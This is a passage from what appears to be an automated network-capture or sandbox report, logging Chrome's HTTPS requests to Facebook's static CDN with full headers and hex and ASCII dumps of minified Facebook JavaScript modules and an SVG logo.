                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC14884INData Raw: 73 74 2c 62 2e 62 6c 6f 63 6b 5d 3b 65 3d 7b 61 3a 65 2c 61 72 74 69 63 6c 65 3a 66 2c 61 73 69 64 65 3a 64 2c 62 3a 6f 2c 62 64 69 3a 70 2c 62 64 6f 3a 71 2c 62 6c 6f 63 6b 71 75 6f 74 65 3a 72 2c 62 72 3a 73 2c 62 75 74 74 6f 6e 3a 74 2c 63 6f 64 65 3a 75 2c 64 65 6c 3a 76 2c 64 69 76 3a 77 2c 65 6d 3a 78 2c 66 69 65 6c 64 73 65 74 3a 79 2c 66 6f 6f 74 65 72 3a 7a 2c 66 6f 72 6d 3a 41 2c 68 31 3a 42 2c 68 32 3a 42 2c 68 33 3a 42 2c 68 34 3a 42 2c 68 35 3a 42 2c 68 36 3a 42 2c 68 65 61 64 65 72 3a 43 2c 68 72 3a 44 2c 69 3a 45 2c 69 6d 67 3a 46 2c 69 6e 70 75 74 3a 47 2c 69 6e 73 3a 48 2c 6b 62 64 3a 49 2c 6c 61 62 65 6c 3a 4a 2c 6c 69 3a 4b 2c 6d 61 69 6e 3a 4c 2c 6e 61 76 3a 4d 2c 6f 6c 3a 4e 2c 6f 70 74 67 72 6f 75 70 3a 4f 2c 6f 70 74 69 6f 6e 3a 50
                                                                                                                                                                                                                                Data Ascii: st,b.block];e={a:e,article:f,aside:d,b:o,bdi:p,bdo:q,blockquote:r,br:s,button:t,code:u,del:v,div:w,em:x,fieldset:y,footer:z,form:A,h1:B,h2:B,h3:B,h4:B,h5:B,h6:B,header:C,hr:D,i:E,img:F,input:G,ins:H,kbd:I,label:J,li:K,main:L,nav:M,ol:N,optgroup:O,option:P
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC16384INData Raw: 64 65 72 22 29 2e 48 65 72 6f 50 6c 61 63 65 68 6f 6c 64 65 72 55 74 69 6c 73 2e 63 72 65 61 74 65 54 68 65 6e 61 62 6c 65 44 65 73 63 72 69 70 74 69 6f 6e 28 61 2e 74 68 65 6e 61 62 6c 65 73 29 7c 7c 22 4e 6f 20 50 72 6f 6d 69 73 65 73 22 3b 72 65 74 75 72 6e 20 61 2b 62 7d 66 75 6e 63 74 69 6f 6e 20 62 61 28 61 2c 62 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 64 3d 7b 63 6f 6d 6d 69 74 43 6f 75 6e 74 3a 30 2c 6c 61 73 74 42 61 73 65 44 75 72 61 74 69 6f 6e 3a 30 2c 6d 61 78 42 61 73 65 44 75 72 61 74 69 6f 6e 3a 30 2c 74 6f 74 61 6c 41 63 74 75 61 6c 44 75 72 61 74 69 6f 6e 3a 30 2c 74 6f 74 61 6c 43 6f 6d 6d 69 74 44 75 72 61 74 69 6f 6e 3a 30 2c 74 6f 74 61 6c 50 6f 73 74 43 6f 6d 6d 69 74 44 75 72 61 74 69
                                                                                                                                                                                                                                Data Ascii: der").HeroPlaceholderUtils.createThenableDescription(a.thenables)||"No Promises";return a+b}function ba(a,b){if(a==null)return null;var d={commitCount:0,lastBaseDuration:0,maxBaseDuration:0,totalActualDuration:0,totalCommitDuration:0,totalPostCommitDurati
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC16384INData Raw: 74 69 6f 6e 20 6f 28 61 2c 62 29 7b 61 3d 61 2e 64 61 74 61 3b 76 61 72 20 63 3d 61 21 3d 6e 75 6c 6c 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 29 29 3a 6e 75 6c 6c 3b 63 21 3d 6e 75 6c 6c 26 26 62 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 64 65 6c 65 74 65 20 63 5b 61 5d 7d 29 3b 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 70 28 61 2c 62 2c 64 2c 65 2c 66 29 7b 66 6f 72 28 76 61 72 20 67 20 69 6e 20 65 29 7b 76 61 72 20 68 3b 69 66 28 28 68 3d 61 2e 71 70 6c 50 6f 69 6e 74 46 69 6c 74 65 72 52 65 67 65 78 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 68 2e 65 78 65 63 28 67 29 29 63 6f 6e 74 69 6e 75 65 3b 66 6f 72 28 68 3d 30 3b 68 3c 65 5b 67 5d 2e 6c 65 6e 67
                                                                                                                                                                                                                                Data Ascii: tion o(a,b){a=a.data;var c=a!=null?JSON.parse(JSON.stringify(a)):null;c!=null&&b.forEach(function(a){return delete c[a]});return c}function p(a,b,d,e,f){for(var g in e){var h;if((h=a.qplPointFilterRegex)==null?void 0:h.exec(g))continue;for(h=0;h<e[g].leng
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC14884INData Raw: 69 6f 6e 28 61 2c 62 29 7b 62 3d 3d 3d 76 6f 69 64 20 30 26 26 28 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 3b 76 61 72 20 63 3d 64 28 22 68 65 72 6f 2d 74 72 61 63 69 6e 67 22 29 2e 48 65 72 6f 4c 6f 67 67 65 72 2e 67 65 6e 48 65 72 6f 49 6e 74 65 72 61 63 74 69 6f 6e 55 55 49 44 41 6e 64 4d 61 72 6b 53 74 61 72 74 28 61 2e 69 6e 74 65 72 61 63 74 69 6f 6e 49 44 2c 61 2e 73 74 61 72 74 54 69 6d 65 29 3b 72 65 74 75 72 6e 20 77 2e 74 72 61 63 65 28 61 2e 63 66 67 2c 61 2e 64 65 70 73 2c 61 2e 71 70 6c 45 76 65 6e 74 2c 62 2c 61 2e 69 6e 74 65 72 61 63 74 69 6f 6e 43 6c 61 73 73 2c 61 2e 74 72 61 63 65 54 79 70 65 2c 61 2e 74 72 61 63 65 50 6f 6c 69 63 79 2c 63 2c 61 2e 73 74 61 72 74 54 69 6d 65 2c 61 2e 65 76 65 6e 74 51 75 65 75 65 54 69 6d 65 2c 61
                                                                                                                                                                                                                                Data Ascii: ion(a,b){b===void 0&&(b=function(){});var c=d("hero-tracing").HeroLogger.genHeroInteractionUUIDAndMarkStart(a.interactionID,a.startTime);return w.trace(a.cfg,a.deps,a.qplEvent,b,a.interactionClass,a.traceType,a.tracePolicy,c,a.startTime,a.eventQueueTime,a


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                40192.168.2.449790157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC374OUTGET /rsrc.php/v3/y1/r/s1oFVSwofs5.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1931INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: JeQBSwe7uoLa+eQ9UCgPuA==
                                                                                                                                                                                                                                Expires: Sun, 28 Sep 2025 02:41:44 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: wOgoprlLZ6qk6bv5lxnYRLtnhzj8ZCqElLdWdm4KSA0aQNLfHEQkQ8eaZ4CTv6WrCq+NaTu0bwkQysX3mJ++6w==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:21 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=4, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 354326
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC15870INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 67 6c 6f 62 61 6c 54 68 69 73 7c 7c 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 73 65 6c 66 7c 7c 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 67 6c 6f 62 61 6c 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 72 65 74 75 72 6e 3b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 74 68 69 73 2e 5f 5f 6c 69 73 74 65 6e
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/"use strict";(function(){var a=typeof globalThis!=="undefined"&&globalThis||typeof self!=="undefined"&&self||typeof global!=="undefined"&&global;if(typeof a.AbortController!=="undefined")return;var b=function(){function a(){this.__listen
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC16384INData Raw: 75 6d 65 72 61 62 6c 65 3d 64 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 3b 64 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 3b 22 76 61 6c 75 65 22 69 6e 20 64 26 26 28 64 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 64 2e 6b 65 79 2c 64 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 26 26 61 28 62 2e 70 72 6f 74 6f 74 79 70 65 2c 63 29 3b 64 26 26 61 28 62 2c 64 29 3b 72 65 74 75 72 6e 20 62 7d 7d 28 29 3b 62 2e 69 6e 68 65 72 69 74 73 4c 6f 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 61 2c 62 29 3b 61 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 62 26 26 62 2e 70 72
                                                                                                                                                                                                                                Data Ascii: umerable=d.enumerable||!1;d.configurable=!0;"value"in d&&(d.writable=!0);Object.defineProperty(a,d.key,d)}}return function(b,c,d){c&&a(b.prototype,c);d&&a(b,d);return b}}();b.inheritsLoose=function(a,b){Object.assign(a,b);a.prototype=Object.create(b&&b.pr
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC16384INData Raw: 74 68 3b 61 2b 2b 29 74 68 69 73 2e 24 32 5b 61 5d 2e 72 65 6d 6f 76 65 28 29 3b 74 68 69 73 2e 24 32 2e 6c 65 6e 67 74 68 3d 30 7d 2c 74 68 69 73 2e 24 31 3d 61 2c 74 68 69 73 2e 24 32 3d 62 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 62 2e 69 73 46 6f 72 41 72 62 69 74 65 72 49 6e 73 74 61 6e 63 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 24 31 7c 7c 68 28 30 2c 32 35 30 36 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 24 31 3d 3d 3d 61 7d 3b 72 65 74 75 72 6e 20 61 7d 28 29 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 70 65 72 66 6f 72 6d 61 6e 63 65 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 62 3d 61 2e 70 65 72
                                                                                                                                                                                                                                Data Ascii: th;a++)this.$2[a].remove();this.$2.length=0},this.$1=a,this.$2=b}var b=a.prototype;b.isForArbiterInstance=function(a){this.$1||h(0,2506);return this.$1===a};return a}();g["default"]=a}),98);__d("performance",[],(function(a,b,c,d,e,f){"use strict";b=a.per
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC16384INData Raw: 28 62 29 7b 24 3d 62 2c 74 79 70 65 6f 66 20 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 21 75 61 26 26 28 75 61 3d 21 30 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 76 61 29 29 7d 76 61 72 20 78 61 3d 7b 6f 6e 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 3a 76 61 2c 73 65 74 75 70 3a 77 61 7d 3b 63 3d 7b 70 72 65 53 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 61 3d 3d 6e 75 6c 6c 7c 7c 61 2e 69 67 6e 6f 72 65 4f 6e 45 72 72 6f 72 21 3d 3d 21 30 29 26 26 77 2e 73 65 74 75 70 28 52 29 2c 28 61 3d 3d 6e 75 6c 6c 7c 7c 61 2e 69 67 6e 6f 72 65 4f 6e 55 6e 61 68 6e 64 6c 65 64 52 65 6a 65 63 74 69 6f 6e 21 3d
                                                                                                                                                                                                                                Data Ascii: (b){$=b,typeof a.addEventListener==="function"&&!ua&&(ua=!0,a.addEventListener("unhandledrejection",va))}var xa={onunhandledrejection:va,setup:wa};c={preSetup:function(a){(a==null||a.ignoreOnError!==!0)&&w.setup(R),(a==null||a.ignoreOnUnahndledRejection!=
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1500INData Raw: 65 2f 69 6e 69 74 22 2c 74 74 69 3a 22 74 74 69 5f 62 69 67 70 69 70 65 22 2c 64 69 73 70 6c 61 79 65 64 3a 22 61 6c 6c 5f 70 61 67 65 6c 65 74 73 5f 64 69 73 70 6c 61 79 65 64 22 2c 6c 6f 61 64 65 64 3a 22 61 6c 6c 5f 70 61 67 65 6c 65 74 73 5f 6c 6f 61 64 65 64 22 7d 2c 73 65 74 43 75 72 72 65 6e 74 49 6e 73 74 61 6e 63 65 5f 44 4f 5f 4e 4f 54 5f 55 53 45 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 3d 61 7d 2c 67 65 74 43 75 72 72 65 6e 74 49 6e 73 74 61 6e 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3d 61 7d 29 2c 6e 75 6c 6c 29 3b 0a 5f 5f 64 28 22 72 65 71 75 69 72 65 43 6f 6e 64 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28
                                                                                                                                                                                                                                Data Ascii: e/init",tti:"tti_bigpipe",displayed:"all_pagelets_displayed",loaded:"all_pagelets_loaded"},setCurrentInstance_DO_NOT_USE:function(a){g=a},getCurrentInstance:function(){return g}};e.exports=a}),null);__d("requireCond",[],(function(a,b,c,d,e,f){function a(
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC14884INData Raw: 7c 7c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 3b 72 65 74 75 72 6e 20 69 7d 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 69 66 28 28 68 7c 7c 28 68 3d 63 28 22 45 78 65 63 75 74 69 6f 6e 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 29 29 29 2e 69 73 49 6e 57 6f 72 6b 65 72 29 7b 61 28 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 7d 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 28 29 3b 61 28 62 29 3b 6a 28 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 7d 67 2e 67 65 74 44 4f 4d 43 6f 6e 74 61 69 6e 65 72 4e 6f 64 65 3d 6a 3b 67 2e 62 61 74 63 68 44 4f 4d 49 6e 73 65 72 74 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 6f 62 6a 65 63 74 56 61 6c 75 65 73 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c
                                                                                                                                                                                                                                Data Ascii: ||document.body);return i}function a(a){if((h||(h=c("ExecutionEnvironment"))).isInWorker){a(null);return}var b=document.createDocumentFragment();a(b);j().appendChild(b)}g.getDOMContainerNode=j;g.batchDOMInsert=a}),98);__d("objectValues",[],(function(a,b,
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC16384INData Raw: 73 2e 24 33 3d 74 68 69 73 2e 24 33 7c 7c 6e 65 77 20 4d 61 70 28 29 3b 74 68 69 73 2e 24 33 2e 73 65 74 28 61 2c 62 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 61 64 64 56 65 63 74 6f 72 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 74 68 69 73 2e 24 33 3d 74 68 69 73 2e 24 33 7c 7c 6e 65 77 20 4d 61 70 28 29 2c 64 3d 74 68 69 73 2e 24 33 2e 67 65 74 28 61 29 7c 7c 5b 5d 3b 64 2e 70 75 73 68 28 62 29 3b 63 2e 73 65 74 28 61 2c 64 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 72 65 67 69 73 74 65 72 4f 6e 42 65 66 6f 72 65 53 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 24 34 2e 70 75 73 68 28 61 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 70 72 65 70 61 72 65 54 6f 53 65 6e 64 3d
                                                                                                                                                                                                                                Data Ascii: s.$3=this.$3||new Map();this.$3.set(a,b);return this};b.addVectorElement=function(a,b){var c=this.$3=this.$3||new Map(),d=this.$3.get(a)||[];d.push(b);c.set(a,d);return this};b.registerOnBeforeSend=function(a){this.$4.push(a);return this};b.prepareToSend=
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC16384INData Raw: 20 6e 65 77 20 45 72 72 6f 72 28 63 28 22 65 72 72 22 29 28 61 2e 6d 65 73 73 61 67 65 29 29 7d 7d 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 62 61 62 65 6c 48 65 6c 70 65 72 73 2e 69 6e 68 65 72 69 74 73 4c 6f 6f 73 65 28 62 2c 61 29 3b 62 2e 74 72 79 50 61 72 73 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 65 2c 66 29 7b 65 3d 3d 3d 76 6f 69 64 20 30 26 26 28 65 3d 28 69 7c 7c 28 69 3d 64 28 22 55 52 49 53 63 68 65 6d 65 73 22 29 29 29 2e 4f 70 74 69 6f 6e 73 2e 49 4e 43 4c 55 44 45 5f 44 45 46 41 55 4c 54 53 29 3b 65 3d 6e 65 77 20 62 28 6e 75 6c 6c 2c 63 2c 65 2c 66 29 3b 72 65 74 75 72 6e 20 6a 28 65 2c 61 2c 21 31 2c 63 29 3f 65 3a 6e 75 6c 6c 7d 3b 62 2e 69 73 56 61 6c 69 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 65 2c 66 29 7b 65 3d 3d 3d 76 6f
                                                                                                                                                                                                                                Data Ascii: new Error(c("err")(a.message))}}a=function(a){babelHelpers.inheritsLoose(b,a);b.tryParse=function(a,c,e,f){e===void 0&&(e=(i||(i=d("URISchemes"))).Options.INCLUDE_DEFAULTS);e=new b(null,c,e,f);return j(e,a,!1,c)?e:null};b.isValid=function(a,c,e,f){e===vo
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC14884INData Raw: 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 6c 6f 61 64 4d 6f 64 75 6c 65 73 28 5b 62 2e 67 65 74 4d 6f 64 75 6c 65 49 64 41 73 52 65 66 28 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 22 70 72 65 6c 6f 61 64 3a 20 22 2b 63 29 7d 29 7d 3b 65 2e 65 71 75 61 6c 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 3d 3d 3d 61 7c 7c 74 68 69 73 2e 24 31 3d 3d 61 2e 24 31 7d 3b 65 2e 67 65 74 4d 6f 64 75 6c 65 49 66 52 65 71 75 69 72 65 61 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 22 4a 53 52 65 73 6f 75 72 63 65 45 76 65 6e 74 73 22 29 2e 6e 6f 74 69 66 79 28 74 68 69 73 2e 24 31 2c 74 68 69 73 2e 24 32 2c 22 41 43 43 45 53 53 45 44 22 29 3b 72 65 74 75 72 6e 20 63 28 22 69 66 52 65 71 75 69 72 65 61 62 6c 65
                                                                                                                                                                                                                                Data Ascii: unction(a){return a.loadModules([b.getModuleIdAsRef()],function(){},"preload: "+c)})};e.equals=function(a){return this===a||this.$1==a.$1};e.getModuleIfRequireable=function(){d("JSResourceEvents").notify(this.$1,this.$2,"ACCESSED");return c("ifRequireable


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                41192.168.2.449788157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC372OUTGET /rsrc.php/y1/r/4lCu2zih0ca.svg HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1904INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: image/svg+xml
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: 7NlAIdLIU8O43rggO6FzAA==
                                                                                                                                                                                                                                Expires: Wed, 17 Sep 2025 21:28:43 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: zUW2UCY9Za4hiEirYlccZh1JrcQPl8Xws3sDARmq2e9rdM9DpZXtrpH1DPRe29SAWf2oYIvvZklo+qpa5gcmNQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:21 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=103, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 2549
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1INData Raw: 3c
                                                                                                                                                                                                                                Data Ascii: <
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC2548INData Raw: 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 39 30 22 20 68 65 69 67 68 74 3d 22 33 36 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 39 30 20 33 36 30 22 3e 0a 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 38 36 36 46 46 22 20 64 3d 22 4d 38 38 31 2e 35 38 33 20 32 35 37 2e 38 39 37 68 32 39 2e 34 38 76 2d 34 37 2e 36 39 36 6c 34 31 2e 31 33 37 20 34 37 2e 36 39 36 68 33 36 2e 30 37 32 6c 2d 34 37 2e 38 39 2d 35 34 2e 39 36 39 20 34 30 2e 39 30 39 2d 34 37 2e 36 36 33 68 2d 33 32 2e 38 32 35 6c 2d 33 37 2e 34 30 33 20 34 33 2e 39 33 76 2d 39 36 2e 39 38 32 6c 2d 32 39 2e 34 38 20 33 2e 38 36 34 76 31 35 31 2e 38
                                                                                                                                                                                                                                Data Ascii: svg xmlns="http://www.w3.org/2000/svg" width="1090" height="360" fill="none" viewBox="0 0 1090 360"> <path fill="#0866FF" d="M881.583 257.897h29.48v-47.696l41.137 47.696h36.072l-47.89-54.969 40.909-47.663h-32.825l-37.403 43.93v-96.982l-29.48 3.864v151.8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                42192.168.2.449792157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
